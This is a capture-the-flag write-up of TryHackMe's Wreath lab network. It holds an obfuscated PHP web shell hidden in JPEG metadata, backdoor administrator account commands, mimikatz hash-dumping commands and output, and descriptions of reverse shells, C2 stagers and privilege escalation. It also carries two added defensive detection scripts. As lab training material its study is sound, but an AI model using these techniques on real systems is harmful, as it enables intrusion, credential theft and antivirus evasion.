Try Hack Me — Wreath
Write-up on THM’s “Wreath” network.
Disclaimer
This document contains materials / information that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
Scenario
There are two machines on my home network that host projects and stuff I’m working on in my own time — one of them has a webserver that’s port forwarded, so that’s your way in if you can find a vulnerability! It’s serving a website that’s pushed to my git server from my own PC for version control, then cloned to the public facing server. See if you can get into these! My own PC is also on that network, but I doubt you’ll be able to get into that as it has protections turned on, doesn’t run anything vulnerable, and can’t be accessed by the public-facing section of the network. Well, I say PC — it’s technically a repurposed server because I had a spare license lying around, but same difference. — Thomas Wreath.
Reconnaissance
Nmap scan report for 10.200.87.200
Host is up (0.10s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
9090/tcp closed zeus-admin
I used nmapAutomator to automate the nmap scans. The initial result above did not reveal Webmin on tcp port 10000; it only showed up when I re-ran the scan with the ‘All’ option.
Summary of the nmapAutomator ‘All’ scan:
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <h1>Error - Document follows</h1>
|_<p>This web server is running in SSL mode. Try the URL <a href='https://ip-10-200-87-200.eu-west-1.compute.internal:10000/'>https://ip-10-200-87-200.eu-west-1.compute.internal:10000/</a> instead.<br></p>
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: UNKNOWN (unable to test)
| IDs: CVE:CVE-2005-3299
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../etc/passwd :
| <h1>Error - Document follows</h1>
| <p>This web server is running in SSL mode. Try the URL <a href='https://ip-10-200-87-200.eu-west-1.compute.internal:10000/'>https://ip-10-200-87-200.eu-west-1.compute.internal:10000/</a> instead.<br></p>
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_ http://www.exploit-db.com/exploits/1244/
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
| http://www.exploit-db.com/exploits/1997/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.37 seconds
Webmin was found running on port 10000/tcp, and further research on MiniServ 1.890 (Webmin httpd) led us to CVE-2019-15107.
A Python exploit for CVE-2019-15107 is also available on GitHub.
┌─[✗]─[arcy24@parrot]─[~/Documents/tools]
└──╼ $git clone https://github.com/MuirlandOracle/CVE-2019-15107
Cloning into 'CVE-2019-15107'...
remote: Enumerating objects: 29, done.
remote: Counting objects: 100% (29/29), done.
remote: Compressing objects: 100% (23/23), done.
remote: Total 29 (delta 9), reused 14 (delta 3), pack-reused 0
Receiving objects: 100% (29/29), 19.47 KiB | 738.00 KiB/s, done.
Resolving deltas: 100% (9/9), done.
┌─[arcy24@parrot]─[~/Documents/tools]
cd into CVE-2019-15107 and install the exploit's Python dependencies:
┌─[✗]─[arcy24@parrot]─[~/Documents/tools/CVE-2019-15107]
└──╼ $sudo pip3 install -r requirements.txt
Collecting argparse
Using cached argparse-1.4.0-py2.py3-none-any.whl (23 kB)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (2.25.1)
Requirement already satisfied: urllib3 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 3)) (1.26.2)
Requirement already satisfied: prompt_toolkit in /usr/lib/python3/dist-packages (from -r requirements.txt (line 4)) (3.0.14)
Installing collected packages: argparse
Successfully installed argparse-1.4.0
Launch the Python exploit against host 10.200.87.200.
The exploit is straightforward: follow the prompts and start a netcat listener on the chosen port to catch the reverse shell.
The shell runs as root, and browsing the .ssh folder reveals an id_rsa private key, which we can copy so we can log in via SSH.
Copy id_rsa to your attack box, chmod 600 the id_rsa file, and log back in to the server with it.
Git Server Enumeration
Download a static nmap binary to your attack box and rename it appropriately. Serve it with a Python HTTP server from your attack box so it can be copied to the ‘prod-serv’ host.
SSH back into ‘prod-serv’.
Copy the nmap binary from the attack box to ‘prod-serv’.
Enumerating hosts in the network
- 10.200.87.1 — ?
- 10.200.87. — ?
- 10.200.87.250 — OpenVPN server
- 10.200.87.200 — PROD-SERV
Further Enumeration
Pivoting
The only access we have is through ‘PROD-SERV’, so we have to use a pivoting technique to reach the other hosts from ‘PROD-SERV’.
We use sshuttle over the SSH connection we already have to ‘PROD-SERV’. The initial attempt failed with a ‘Broken Pipe’ error, which occurs when the compromised machine we are tunnelling through is itself part of the subnet we are routing to.
- Note that the IP addresses changed due to a network reset, but the hosts are the same (from 10.200.87.x to 10.200.72.x).
To fix the broken pipe error, we use the ‘-x’ option to exclude the server we are connecting through from the routed range.
Initial access to http://10.200.72.x
Enumerating web services
The default username and password do not work, so we have to research exploits for GitStack.
Possible exploits
Downloading and Prepping the exploit
Use GitStack 2.3.10 Remote Code Execution.
Convert the DOS line endings to Unix using dos2unix so the Python script runs without errors.
Read through the exploit and update it to match the target server, then execute it. Note: I also had to add the hostname to my hosts file.
The exploit works, and commands are executed as ‘nt authority\system’.
Further testing of the exploit with curl to gather more information.
Using Burp
Reverse shell
The next task is to get a reverse shell from the ‘git-serv’ host to ‘prod-serv’. Remember that the pivoting set up earlier is still needed to make this work.
On ‘prod-serv’, copy over netcat.
Using the same vector, send a PowerShell reverse shell command to ‘git-serv’.
Now that we have a CLI connection to the ‘git-server’, the next tasks are to add a user and add that user to the Administrators and Remote Management Users groups.
PS C:\GitStack\gitphp> net user arcy24 bugok123 /add
The command completed successfully.
PS C:\GitStack\gitphp> net localgroup Administrators arcy24 /add
The command completed successfully.
PS C:\GitStack\gitphp> net localgroup "Remote Management Users" arcy24 /add
The command completed successfully.
PS C:\GitStack\gitphp> net user arcy24
User name                    arcy24
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            26/04/2021 12:31:19
Password expires             Never
Password changeable          26/04/2021 12:31:19
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
                             *Users
Global Group memberships     *None
The command completed successfully.
Using evil-winrm to test our account
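From the defender's side, the account creation above leaves a characteristic trail: a user is created and, within seconds, added to Administrators and Remote Management Users. The following detection is an added example written for this write-up (not part of the original or of any tool it uses); the event records are constructed to mirror Windows Security events 4720 and 4732, and the field names are an assumption of the example rather than the exact log schema.

```python
from datetime import datetime, timedelta

# Constructed sample records shaped like Windows Security events 4720 (user account
# created) and 4732 (member added to a security-enabled local group); not real log data.
SAMPLE_EVENTS = [
    {"time": "2021-04-26T12:31:19", "id": 4720, "account": "arcy24"},
    {"time": "2021-04-26T12:31:40", "id": 4732, "account": "arcy24", "group": "Administrators"},
    {"time": "2021-04-26T12:31:55", "id": 4732, "account": "arcy24", "group": "Remote Management Users"},
    {"time": "2021-04-20T09:00:00", "id": 4720, "account": "svc_backup"},
    {"time": "2021-04-21T09:00:00", "id": 4732, "account": "svc_backup", "group": "Backup Operators"},
    {"time": "2021-04-26T13:05:00", "id": 4732, "account": "helpdesk", "group": "Administrators"},
]

# Group memberships that give a freshly created local account remote admin access.
SENSITIVE_GROUPS = {"administrators", "remote management users", "remote desktop users"}


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_fast_admin_creations(events, window=timedelta(minutes=10)):
    """Correlate 4720 with 4732 for the same account inside `window`.

    Returns one alert per account {account, created, groups, seconds}, where
    `groups` are the sensitive groups joined within `window` of the account's
    creation and `seconds` is the delay of the last such addition. Accounts
    created long before, or added only to non-sensitive groups, are ignored;
    a 4732 with no matching 4720 (e.g. "helpdesk") is left for other rules.
    """
    created = {}
    joined = {}
    for ev in sorted(events, key=_ts):
        name = ev["account"].lower()
        if ev["id"] == 4720:
            created[name] = _ts(ev)
        elif ev["id"] == 4732 and name in created:
            delta = _ts(ev) - created[name]
            if timedelta(0) <= delta <= window and ev["group"].lower() in SENSITIVE_GROUPS:
                joined.setdefault(name, []).append((ev["group"], int(delta.total_seconds())))
    alerts = []
    for name, groups in joined.items():
        alerts.append({
            "account": name,
            "created": created[name].isoformat(),
            "groups": [g for g, _ in groups],
            "seconds": max(s for _, s in groups),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_fast_admin_creations(SAMPLE_EVENTS):
        print(f"ALERT: {alert['account']} created {alert['created']}, "
              f"joined {alert['groups']} within {alert['seconds']}s")
```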
Post Exploitation
The next step is to use Mimikatz to dump the local account password hashes. First, upload mimikatz.exe to ‘git-serv’.
Mimikatz
Start mimikatz and set the parameters. Set the debug privilege and elevate integrity to SYSTEM level:
privilege::debug
token::elevate
Set logging:
log c:\users\arcy24\Downloads\mimikatz.log
Dump the SAM via lsadump:
mimikatz # lsadump::sam
Domain : xxxxx
SysKey : 0841f6354f4b96d21b99345d07b66571
Local SID : S-1-5-21-3335744492-1614955177-2693036043
SAMKey : f4a3c96f8149df966517ec3554632cf4
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 37db630168e5f82xxxxxxxxxxxx
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 68b1608793104cca229de9f1dfb6fbae
* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-1696O63F791Administrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 8f7590c29ffc78998884823b1abbc05e6102a6e86a3ada9040e4f3dcb1a02955
aes128_hmac (4096) : 503dd1f25a0baa75791854a6cfbcd402
des_cbc_md5 (4096) : e3915234101c6b75
Since we have the administrator's hash, we can use evil-winrm to pass the hash and log in. I also grabbed the other users' hashes, which may be needed later.
Command & Control
I will be using Empire as the C&C tool, as I am somewhat familiar with it. Empire does not come pre-installed on Kali or Parrot OS, so you have to install it from https://github.com/BC-SECURITY/Empire.
First, set up a listener via the CLI.
Listeners can also be created via the UI.
Empire is straightforward to use, and if you are familiar with Metasploit, Empire's syntax is almost identical.
Next is to create our stagers.
Create a multi/bash stager that uses the http listener we created earlier (via Starkiller).
Once the stager has been generated, run it on ‘prod-serv’.
Once it connects, you can check the status of the agents and start interacting with the host.
Back to Pivoting
Next, we have to get Empire agents onto the ‘git-server’. The only access we have is via ‘prod-serv’, so the challenge is to install an Empire agent on the ‘git-server’ and have it communicate with our listener on the attack box.
Since we have been using Empire, we'll proceed with http_hop. Hop listeners generate files to be copied to our compromised ‘prod-serv’ host, where they are served; these files contain instructions to connect back to a normal (usually HTTP) listener on our attacking machine.
It took me a while to wrap my head around this process, but the key is to get agents deployed in the network and have them communicate back to you via your compromised servers.
First, configure the http_hop listener; note that the RedirectListener is the listener we created on the attack box earlier.
Once configured, execute it; the PHP files will be created in /tmp.
Copy these files to the compromised host ‘prod-serv’ and serve them using PHP.
Next, create a stager in Empire, either from the CLI or through Starkiller.
After submitting, you will be given a PowerShell command that we'll use to install our agent on the ‘git-server’.
From my attack box, I used curl to POST the URL-encoded PowerShell command from our Empire stager.
On ‘prod-serv’ you will see the agent start communicating back once the ‘git-server’ has accessed all the PHP files.
Empire agent active
Now that the empire agent is active, we can launch different modules such as but not limited to, WinPeas, Sherlock, etc. for privilege escalation or even Mimikatz to dump hashes.
Personal PC
So far, we have learned how to reach the git-server by pivoting via sshuttle from prod-serv.
Enumerating Personal PC
Load the Empire PowerShell modules into Evil-WinRM using the -s option (the path to the PS scripts).
Load the portscan module ‘Invoke-Portscan.ps1’ and scan the ‘Personal PC’.
With the scan results in hand, tcp/80 is our likely way in. RDP on tcp/3389 is no use to us without a username and password.
Here's the tricky part: we need a way to reach the “Personal PC” from our attack box. We know how to reach the “Git-server” via sshuttle, but what about the “Personal PC”?
I tried several approaches, but the simplest is to combine sshuttle with chisel. Here's what we need:
- chisel: one binary for the attack box and another for the “git-server”. https://github.com/jpillora/chisel/releases/tag/v1.7.6
- A working sshuttle connection (the first pivot)
- An evil-winrm connection to the “git-server”
Upload chisel.exe to the “Git-server”.
Before creating the chisel socket, ensure a Windows firewall rule is created for the port.
Start the chisel server on port 47000 in socks5 mode.
On the attack box, set up the proxy connection in Firefox using FoxyProxy.
Then start the chisel client with a SOCKS listener on port 9090.
Now we should be able to reach the web page. It is a bit slow since we are literally pivoting / tunnelling twice.
The Wonders of Git
Once you have gone through the “Wonders of Git”, “Website Code Analysis” and “Exploit PoC” tasks, you will come across a web directory that allows file uploads; this is our attack vector.
The goal is to upload an image file that contains a PHP web shell. Thomas is possibly running AV that checks files uploaded to our target host for malicious content.
Here’s what we need:
- Exiftool — is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files.
- PHP Obfuscator — https://www.gaijin.at/en/tools/php-obfuscator
- a jpeg file
Build the payload
<?php
$cmd = $_GET["wreath"];
if(isset($cmd)){
echo "<pre>" . shell_exec($cmd) . "</pre>";
}
die();
?>
PHP Obfuscator
Obfuscated payload
<?php $r0=$_GET[base64_decode('d3JlYXRo')];if(isset($r0)){echo base64_decode('PHByZT4=').shell_exec($r0).base64_decode('PC9wcmU+');}die();?>
Then, escape the dollar signs so the shell does not interpret them as bash variables:
<?php \$r0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$r0)){echo base64_decode('PHByZT4=').shell_exec(\$r0).base64_decode('PC9wcmU+');}die();?>
Lastly, use ExifTool to embed the obfuscated payload in the image's metadata.
Upload our shell
And execute commands
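The upload technique above works because the image passes an extension and magic-byte check while its metadata carries PHP. A server-side upload filter should instead walk the JPEG marker segments and look for PHP inside them. The scanner below is an added example written for this write-up, not code from the original or from any tool it mentions; the signature list, the minimal sample JPEG and the COM-segment placement (which is where exiftool's -Comment tag lands) are assumptions of the example.

```python
import re
import struct

# Byte patterns that betray PHP hiding in image metadata; the page's shell uses
# $_GET, shell_exec and base64_decode, and the escaped "\$r0" form is covered too.
PHP_SIGNATURES = [
    re.compile(rb"<\?php"),
    re.compile(rb"<\?="),
    re.compile(rb"\\?\$_(GET|POST|REQUEST|COOKIE)\s*\["),
    re.compile(rb"\b(shell_exec|exec|system|passthru|eval)\s*\("),
    re.compile(rb"base64_decode\s*\("),
]
EOI, SOS = 0xD9, 0xDA
STANDALONE = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))  # markers with no length field

def jpeg_segments(data):
    """Yield (marker, payload) per length-prefixed segment up to SOS, then (None, rest)
    for the entropy-coded scan, EOI and anything appended after it (polyglot trailers)."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                 # padding byte before a marker
            pos += 1
            continue
        if marker in STANDALONE:
            pos += 2
            if marker == EOI:
                break
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length
        if marker == SOS:                  # scan data follows; stop walking markers
            break
    yield None, data[pos:]

def find_php_in_jpeg(data):
    """Return [(segment, matched_text)] for every PHP signature found anywhere in the file."""
    hits = []
    for marker, payload in jpeg_segments(data):
        where = "scan/trailing data" if marker is None else f"0x{marker:02X}"
        for sig in PHP_SIGNATURES:
            m = sig.search(payload)
            if m:
                hits.append((where, m.group(0).decode("latin-1")))
    return hits

def _segment(marker, payload):
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

def build_sample_jpeg(comment):
    """Constructed minimal JPEG (JFIF header, one COM segment, stub SOS, EOI); not a real photo."""
    return (b"\xff\xd8" + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
            + _segment(0xFE, comment) + _segment(SOS, b"\x01\x01\x00\x00\x3f\x00")
            + b"\x12\x34\xff\xd9")

# The obfuscated web shell from this write-up, placed in the comment as exiftool -Comment would.
OBFUSCATED_SHELL = (b"<?php $r0=$_GET[base64_decode('d3JlYXRo')];if(isset($r0)){echo base64_decode"
                    b"('PHByZT4=').shell_exec($r0).base64_decode('PC9wcmU+');}die();?>")
```

Rejecting any upload with a non-empty hit list (or stripping all metadata with a re-encode) closes this vector regardless of how the PHP is obfuscated, since the `<?php` opener and the superglobal access cannot be base64-hidden.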
Dropping Netcat
The next phase is to upload netcat to Thomas' PC and get a reverse shell. First, set up a web server to host our file (nc.exe).
Download nc.exe from our attack host to Thomas' PC via curl into C:\Windows\temp\.
Then, set up a netcat listener on port 4444.
Execute using a PowerShell command.
Initial Foothold ‘Wreath-PC’
System Information
Host Name: WREATH-PC
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-70000-00000-AA778
Original Install Date: 08/11/2020, 14:55:50
System Boot Time: 08/06/2021, 11:40:41
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2395 Mhz
BIOS Version: Xen 4.2.amazon, 24/08/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,048 MB
Available Physical Memory: 1,298 MB
Virtual Memory: Max Size: 2,432 MB
Virtual Memory: Available: 1,793 MB
Virtual Memory: In Use: 639 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 5 Hotfix(s) Installed.
[01]: KB4580422
[02]: KB4512577
[03]: KB4580325
[04]: KB4587735
[05]: KB4592440
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Ethernet
DHCP Enabled: Yes
DHCP Server: 10.200.84.1
IP address(es)
[01]: 10.200.84.100
[02]: fe80::593:54b8:b02b:2440
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
C:\xampp\htdocs\resources\uploads>
Further Enumeration
whoami
wreath-pc\thomas

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\xampp\htdocs\resources\uploads>whoami /groups

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288

C:\xampp\htdocs\resources\uploads>
Privilege Escalation
Researching ‘SeImpersonatePrivilege Impersonate a client after authentication Enabled’ led me to https://github.com/itm4n/PrintSpoofer (“PrintSpoofer and Potato series of privilege escalation exploits”).
Serve PrintSpoofer.exe from a web server on the attack box.
From Wreath-PC, download PrintSpoofer.exe.
And now we have administrator privileges. There are other possible privilege escalation paths on this host, but this is the simplest one I found. I will update this write-up once I find additional methods.
Conclusion
This concludes our write-up for TryHackMe's Wreath network. I unquestionably learned a lot working through it. Pivoting and AV evasion were my favourite tasks, along with running Empire and Starkiller for post-exploitation!
Tools and References:
- Nmap Automator — https://github.com/21y4d/nmapAutomator
- CVE-2019-15107 — https://github.com/MuirlandOracle/CVE-2019-15107
- sshuttle — https://github.com/sshuttle/sshuttle
- mimikatz — https://github.com/gentilkiwi/mimikatz/wiki
- Empire post-exploitation framework — https://github.com/BC-SECURITY/Empire
- Chisel — https://github.com/jpillora/chisel
- ExifTool — https://exiftool.org/
- PrintSpoofer — PrintSpoofer and Potato series of privilege escalation exploits https://github.com/itm4n/PrintSpoofer
- Wreath — https://tryhackme.com/room/wreath